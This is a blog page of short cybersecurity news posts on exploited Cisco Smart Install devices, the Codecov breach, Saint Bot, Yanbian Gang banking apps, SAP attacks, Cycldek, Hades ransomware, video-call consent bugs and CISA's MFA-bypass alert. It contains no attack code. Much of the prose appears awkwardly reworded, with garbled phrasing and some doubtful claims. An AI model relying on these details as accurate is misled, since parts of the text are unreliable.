Search This Blog

Showing posts with label Threat actors. Show all posts

Cisco Smart Install Protocol is Still Being Exploited in Cyber-Attacks

 

Five years after Cisco issued its first warning, the Smart Install protocol is still being utilized in assaults, and there are around 18,000 internet-exposed devices that might be targeted by hackers. Smart Install is a plug-and-play configuration and image-management technology from Cisco that allows new switches to be deployed with zero-touch. Smart Install can be extremely important to organizations, but it can also be a significant security concern. 

A Smart Install network consists of a group of networking devices known as clients that are served by a common Layer 3 switch or router that serves as a director. You can use the Zero-Touch Installation process in a Smart Install network to install new access layer switches without the help of the network administrator. The director acts as a central management point for client switch images and configuration. When a new client switch is added to the network, the director immediately recognizes it and determines which Cisco IOS image and configuration file should be downloaded. 

The function remains enabled and can be accessed without authentication once a device has been set up via Smart Install. Malicious actors have been able to remotely target devices with Smart Install enabled, including reloading devices, loading a new operating system image, and running arbitrary commands with elevated privileges. 

After an exploitation tool was made public in 2016, Cisco issued a warning on the misuse of Smart Install. In 2017 and 2018, the company sent more alerts, identifying hundreds of thousands of vulnerable devices, including those in critical infrastructure organizations. In 2018, it was revealed that hacktivists targeted the Smart Install function in assaults on Cisco switches in Iran and Russia as part of an ostensibly pro-US attack, as well as a state-sponsored cyberespionage group affiliated to Russia. 

In 2016, the number of networking equipment vulnerable to Smart Install assaults surpassed 250,000, but by 2018 it had reduced to 168,000. The Shadowserver Foundation is still keeping track of the number of potentially susceptible devices, reporting that almost 18,000 are currently online, including many in North America, South Korea, the United Kingdom, India, and Russia. 

Last month, Lumen Technologies' Black Lotus Labs cybersecurity unit discovered that a hacktivist group had compromised at least 100 internet-exposed routers belonging to both public and private sector entities, most of which were based in the United States.

The Code Testing Company CodeCov Suffers a Data Breach Which Went Undetected for Months

 

U.S. federal authorities are investigating a safety violation at Codecov, which works on selling a tool that allows developers to calculate their codebase coverage and works for more than 29,000 clients worldwide. The organization acknowledged the violation and reported that for months it remained unnoticed. 

The violation impacted an unaccompanied number of customers, including Atlassian, Proctor & Gamble, GoDaddy, and Washington Post. To be specific, attackers used a bug of the Docker image to access a Bash Uploader script to map development environments and report back to the company in the company production. In the wake of the discovery of the violation on April 1st, 2021, a follow-up investigation discovered that the threat actor had access to their system for months, at least since 31 January. Three additional bash uploaders were also affected by the vulnerability, including the Codecov CircleCI Orb, Codecov-actions for GitHub, and Codecov Bitrise Phase. 

Codecov website, CEO Jerrod Engelberg clarified in the security update that the cybercriminals gained unauthorized access, to the Bash Uploader scripts, while modifying and accessing the passwords, tokens, or keys stored in continuous customer integration environments, datastores, and application code that can be manipulated using these credentials, tokens, or keys. The information was then transferred to a non-Codecov third-party server. The possibility for downstream effects on Codecov users may be high, but the extent of harm will depend on several factors like the identification and motifs of the actor, the way that Codecov structures its network, and what protocols, configurations, and access policies every user is using for their code environment. 

Codecov is not a publicly traded firm, which employs a few dozen of candidates and measures its annual turnover in the smallest million dollars per year. On contrary, it employs just a few candidates; Despite the high profile of a few of their clients, they have not been particularly in attention since 2014 and this indicates that the threat actor must have done a good deal of research before choosing them as a target. 

The degree of segmentation of Codecov's network could also partly decide what information and data of customers the threat actors had been able to access. They are equally unable to pull open-source code from the internet directly and use it. “It seems like every time I hire a new developer, that’s the first thing they do with the code they write, so we have to put automated checks in there so the moment somebody tries to do that, they get caught and it stops,” said Zanni. 

As a standard practice, many have cited robust code signing policies. The infringement reflected the "huge ROI for attackers to attack the supply chain," and John Loucaides, Vice President of Research and Development at a vulnerability research firm, said that any alteration to the code must be vetted by other parties before approval. 

Bambenek says that although attackers have gone completely unnoticed for months, detecting and revealing a trivial change in the code in three months is amazing for a small company with limited resources like Codecov. He correlated it with SolarWinds, which skipped significant improvements in Orion's software construction platform, if not longer, by at least a year, both by itself and by a multitude of customers and federal agencies with higher budgets. 

“Codecov maintains a variety of information security policies, procedures, practices, and controls. We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event,” Engelberg stated in the regard. “We regret any inconvenience this may cause and are committed to minimizing any potential impact on you, our users, and customers.”

New Malware Downloader Spotted in Targeted Campaigns

 

In recent weeks, a relatively sophisticated new malware downloader has emerged that, while not widely distributed yet, appears to be gaining momentum. Malwarebytes researchers recently discovered the Saint Bot dropper, as they have termed it, being used as part of the infection chain in targeted campaigns against government institutions in Georgia. 

Saint Bot was discovered by researchers while investigating a phishing email containing a zip file containing malware they had never seen before. The zip file included an obfuscated PowerShell script disguised as a link to a Bitcoin wallet. According to Malwarebytes, the script started a chain of infections that led to Saint Bot being dropped on the compromised system. 

In each case, the attackers used Saint Bot to drop information stealers and other malware downloaders. According to the security vendor, the new loader is probably being used by a few different threat actors, implying that there are likely other victims. 

One of the information stealers that Saint Bot has noticed dropping is Taurus, a malware tool designed to steal passwords, browser history, cookies, and data from auto-fill. The Taurus stealer can also steal FTP and email client credentials, as well as system information such as configuration details and installed software. According to Malwarebytes, while Saint Bot mostly has been observed dropping stealers, the dropper is designed to deliver any malware on a compromised system. 

Malware droppers are specialized tools designed to install various types of malware on victim systems. One of the most notable recent examples of such malware is Sunburst, the tool that was distributed via poisoned SolarWinds Orion software updates to some 18,000 organizations worldwide. In that case, the dropper was specifically designed to deliver targeted payloads on systems belonging to organizations of particular interest to the attackers. 

Basically, the downloaders are first-stage malware tools designed to deliver a wide range of secondary and tertiary commodity payloads, such as ransomware, banking Trojans, cryptominers, and other malicious tools. Some of the most popular droppers in recent years, such as Emotet, Trickbot, and Dridex, began as banking Trojans before their operators switched tactics and used their Trojans as malware-delivery vehicles for other criminals. 

Saint Bot, like many other droppers, has several unclear and anti-analysis features to help it avoid malware detection tools. It is designed to detect virtual machines and, in some cases, to detect but not execute on systems located in specific Commonwealth of Independent States countries, which include former Soviet bloc countries such as Russia, Azerbaijan, Armenia, Uzbekistan, Ukraine, and Moldova.

"As we were about to publish on this downloader, we identified a few new campaigns that appear to be politically motivated and where Saint Bot was being used as part of the infection chain. In particular, we observed malicious documents laced with exploits often accompanied by decoy files." a spokesman from Malwarebytes' threat intelligence team states. In all instances, Saint Bot was eventually used to drop stealers. 

According to Malwarebytes, while Saint Bot is not yet a widespread threat, there are indications that the malware's creators are still actively working on it. According to the security vendor, its investigation of the Saint Bot reveals that a previous version of the tool existed not long ago. " Additionally, we are also seeing new campaigns that appear to be from different customers, which would indicate that the malware author is involved in further customizing the product," a Malwarebytes spokesman said.

Yanbian Gang Malware Continues With Large-Scale Distribution and C2

 

Fake banking apps laced with malware remain a crucial factor in the success of threat actors. For the Yanbian gang, a criminal group in Yanbian, China that targets organizations across Asia, it's a skill they have been honing for more than a decade. 

Since 2013, the Yanbian Gang has been targeting South Korean Android mobile banking customers with malicious Android apps impersonating major banks, including Shinhan Savings Bank, Saemaul Geumgo, Shinhan Finance, KB Kookmin Bank, and NH Savings Bank. RiskIQ's threat research team examined some of the threat group's most recent activity in this vector to examine their malware of choice as well as the large-scale hosting infrastructure they use to distribute and control it. 

Hundreds of Korean language-specific apps were discovered across an extensive list of IP addresses during the researchers' analysis of Yanbian Android apps. These apps were created to steal information from infected victims, such as loan application details, contacts, SMS messages, phone call details, call logs, and applications currently installed on the device. 

Since December 2020, RiskIQ's analysis has identified 377 individual samples of malicious Android apps developed and distributed by the Yanbian Gang. Many of these apps have multiple versions and set up services to run in the background of victim phones, both of which fit the Yanbian Gang's known method of operation. 

While these apps appear to be simple, they are capable of performing a variety of malicious activities that the victim is unaware of. Yanbian Gang actors obtain information not only about the victim, but also their contacts, installed applications, and even messages sent from the infected device. These apps also have a plethora of permissions that they can potentially abuse for malicious purposes that can be abused for malicious purposes. 

One of the discoveries of research was references to various URL paths that led to a specific IP address via HTTP. The Yanbian Gang refers to these paths as "methods," and they serve as Command and Control (C2), allowing the app to initiate device registration, assess device capabilities, steal information, and receive instructions from specified C2 servers. 

Researchers at RiskIQ observed one of the samples communicating using only some of these "methods," most likely due to the limited amount of data stored in their testing device and its lack of features. These communications were sent to the C2 server via encrypted HTTP POST and GET requests. 

The Yanbian Gang continues to target South Korean users with malware, tactics, and targeting similar to that previously reported in 2015. However, the group has evolved to separate infrastructure based on function and to switch hosting providers. Yanbian Gang actively leverages web servers hosting their call-to-action and malicious application delivery, C2 servers, and servers running the Real-Time Messaging Protocol that receive call information, according to RiskIQ.

Active Cyber Attacks on Mission-Critical SAP Apps

 

Security researchers are warning about the arrival of attacks targeting SAP enterprise applications that have not been updated to address vulnerabilities for which patches are available, or that utilize accounts with weak or default passwords. 

Over 400,000 organizations worldwide and 92% of Forbes Global 2000 use SAP's enterprise apps for supply chain management, enterprise resource planning, product lifecycle management, and customer relationship management.

According to a study released jointly by SAP and Onapsis, threat actors launched at least 300 successful attacks on unprotected SAP instances beginning in mid-2020. Six vulnerabilities have been exploited, some of which can provide complete control over unsecured applications. Even though SAP had released fixes for all of these flaws, the targeted companies had not installed them or were using unsecured SAP user accounts. 

"We're releasing the research Onapsis has shared with SAP as part of our commitment to help our customers ensure their mission-critical applications are protected," Tim McKnight, SAP Chief Security Officer, said. 

"This includes applying available patches, thoroughly reviewing the security configuration of their SAP environments, and proactively assessing them for signs of compromise." Researchers also observed attackers targeting six flaws, these flaws, if exploited, can be used for lateral movement across the business network to compromise other systems. 

The threat actors behind these attacks have exploited multiple security vulnerabilities and insecure configurations in SAP applications in attempts to breach the targets' systems. In addition, some of them have also been observed while chaining several vulnerabilities in their attacks to "maximize impact and potential damage."

According to an alert issued by CISA, organizations impacted by these attacks could experience, theft of sensitive data, financial fraud, disruption of mission-critical business processes, ransomware, and halt of all operations. 

Patching vulnerable SAP systems should be a priority for all defenders since Onapsis also found that attackers start targeting critical SAP vulnerabilities within less than 72 hours, with exposed and unpatched SAP apps getting compromised in less than three hours. 

Both SAP and Onapsis recommended organizations to protect themselves from these attacks by immediately performing a compromise assessment on SAP applications that are still exposed to the targeted flaws, with internet-facing SAP applications being prioritized. 

Also, companies should assess all applications in the SAP environment for risk as soon as possible and apply the relevant SAP security patches and secure configurations; and assess SAP applications to uncover any misconfigured high-privilege user accounts.

"The critical findings noted in our report describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years," said Onapsis CEO Mariano Nunez.

"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action" Nunez added.

The Less Progressive but Consistent, Cycldek Threat Actors

 

It is somewhat usual for tools and methodologies to be allowed to share throughout the nebula of Chinese threat actors. The infamous "DLL side-loading triad" is one of that kind of example. The side-loading-dynamic link library (DLL) is an extremely effective method of cyber-attack that benefits from the management of DLL files by Microsoft Windows applications. A genuine executioner, a malicious DLL, and an encrypted payload have usually been dropped from a self-extraction file. Initially regarded as the LuckyMouse signature, developers observed that other organizations were using a similar 'triad' like HoneyMyte. Although it indicates that attacks depending only on this technique cannot be attributed, the efficient prevention of such triads shows increasing malicious activity. 

A malware sample has been identified by researchers knows as FoundCore Loader which is configured to attack high-profile organizations in Vietnam. As per the high-level perspective of the researchers, the virus chain follows an execution that starts from the – FINDER.exe (a genuine MS Outlook file) which side loads to the outbill.dll (a malicious loader ) that eventually hijacks the flow of the execution and decrypts and runs a Shellcode placed in a rdmin.src file ( that is a malicious loader companion). 

The FoundCore payload is the final payload that is a remote access tool that provides its operators with complete control of the victim machine. This malware begins with 4 threads when it is executed. The first one determines persistence through the development of a service. The second establishes unclear information for the system by modifying its fields like 'Description,' 'Image Path,' 'Display Name' (among others). The third set the vacant DACL ("D:P" SDDL) image for the current process to avoid access to the entire malicious file. To discourage the malicious file from entering. In the end, the worker thread bootstraps execution and connects to the C2 server. It can also incorporate a copy of itself into another process, based on its configuration. FoundCore gives complete control of the victim's machine to the threat player. The malware supports various instructions to manipulate the filesystem, manipulate the procedure, execute arbitrary commands, and record screenshots. DropPhone and CoreLoader are other malware delivered during the attacks. 

Cycldek, which has been active since 2013 and is also recognized as Goblin Panda and Conimes, is famous for its targeted delivery and preferences being the Vietnam targets and the governments in South East Asia. As per a report, that in June 2020 a piece of personalized malware had been used to exfiltrate airborne data, a clear sign of transformation for a group considered less sophisticated. According to Kaspersky, more recent attacks show even more sophistication. 

A genuine part of Microsoft Outlook was mistreated to load a DLL which would operate a shellcode that acts as a loader of FoundCore RAT in an attack on a high-profile Vietnamese organization. While Cycldek has been regarded to be one of the less advanced threat actors in the Chinese-speaking world, the goal of the campaign is recognized to be consistent.

Hades Ransomware Attacks US Big Game

 

An obscure monetarily spurred threat group is utilizing the self-proclaimed Hades ransomware variant in cybercrime activities that have affected at least three victims since December 2020. Known victims incorporate a huge US transportation and logistics organization, a huge US consumer products organization, and a worldwide manufacturing organization. 

Tactics, Techniques, and Procedures (TTP) utilized to compromise a victim network, escalate privileges, move laterally, evade defenses, exfiltrate data and deploy Hades ransomware are relatively consistent with other notable ransomware operators, utilizing a mix of commodity tooling and various living-off-the-land techniques. When Hades lands on a victim's machine, it duplicates itself and relaunches itself through the command line. The 'spare' duplicate is then erased and an executable is unloaded in memory. A scan is then performed in local directories and network offers to discover content to encrypt however every Hades sample secured uses a different extension. 

Moreover, Accenture recognized extra Tor covered up services and clearnet URLs by means of different open-source reporting relating to the Hades ransomware samples. For every examined sample, the ransom notes distinguished educate the victim to install Tor browser and visit the predetermined page. The Tor pages vary just in the Victim ID that is given, demonstrating every Tor address might be particularly created for every victim. Accenture Security distinguished an aggregate of six of these addresses, showing there could be three extra victims that they are unaware of as of now. 

Right now, it is hazy if the obscure threat group works under an affiliate model, or if Hades is appropriated by a solitary group. Under an affiliate model, developers partner with affiliates who are answerable for different undertakings or phases of the operation lifecycle, for example, conveying the malware, giving starting admittance to associations, or even target selection and reconnaissance. In any case, in light of intrusion information from incident response engagements, the operators tailor their strategies and tooling to deliberately chose targets and run a more “hands-on keyboard” operation to inflict maximum damage and higher payouts. 

Likewise, Accenture recognized similarities in the Hades ransom notes to those that have been utilized by REvil ransomware operators, where parts of the ransom notes observed contain identical wording.

Serious Vulnerabilities Discovered in Group Face Time Apps

 

Threat actors utilized Google Duo, Facebook Messenger, Signal, JioChat, and Mocha messaging apps vulnerabilities to their advantage by listening to user’s surroundings without any consent before the user on the other side received the call.

Natalie Silvanovich, a Google project Security Researcher discovered the [Group Face Time] bug in multiple video conferencing mobile applications and now all the vulnerabilities in these apps are fixed. iPhones, renowned across the globe for their security features were reported with a critical flaw in January 2019. 

Apple’s FaceTime group chat vulnerabilities allowed hackers to start off a FaceTime video call and eavesdrop on targets. Threat actors tricked the users by attaching their own number as a third person in a group chat right before the user on the other end received the call. This vulnerability was considered so critical that forced the company to eradicate the FaceTime group chats feature. Later, the issue was resolved via iOS update.

Natalie Silvanovich stated that “I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the application”. 

“however when I looked at real applications, they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee”, she further added. 

In December 2020 the Google Duo bug, a race condition that permitted callees to leak video packets from unanswered calls to the caller was patched. Two relatable vulnerabilities were discovered in the Mocha messengers and JioChat in July 2020; vulnerabilities that permitted sending JioChat audio, patched in July 2020. Mocha messengers audio and video bugs were patched in August 2020 after exploitation by the threat actors.

Threat Actors Bypassed MFA to Gain Access to Cloud Service Accounts

 

The United States Cybersecurity and Infrastructure Agency (CISA) has alerted the firms by stating that cyber attackers are bypassing multi-factor authentication (MFA) protocols to secure access to the cloud service accounts.

Threat actors often use username and password combinations while targeting the organizations but hackers usually are unsuccessful in doing so due to an enabled multi-factor authentication by an organization. CISA said, threat actors successfully gained access to a user’s account despite MFA being enabled, at one instance, in this incident the hackers may have used browser cookies to bypass MFA. 

The threat actors use stolen cookies to gain access to web applications or online services and take control over an authenticated session. CISA noticed that cyber attackers are taking benefits of email forwarding protocols by storing critical information regarding the user’s personal email accounts.

CISA stated in the report that “in one case, we determined that the threat actors modified an existing email rule on a use’s account-originally set by the user to forward emails sent from a certain sender to a personal account-to redirect the emails to an account controlled by the actors. The threat actors updated the rule to forward all email to the threat actors’ accounts”.

Threat actors also designed new mailbox regulations, which were created to send specific messages to the users. These messages contained specific phishing related keywords and these messages were transmitted by using Really Simple Syndication (RSS) feeds or RSS subscription folders to keep users from being alerted. CISA also clarified that this data breach has no link to the SolarWinds supply chain attack.

While explaining further, CISA told, “recommended mitigations for organizations to strengthen their cloud environment configuration to protect against, detect and respond to potential attacks”. These recommendations also include tactics, techniques, and procedures (TTPs) which will provide assistance to the security teams to counter the attacks by threat actors on their organizations.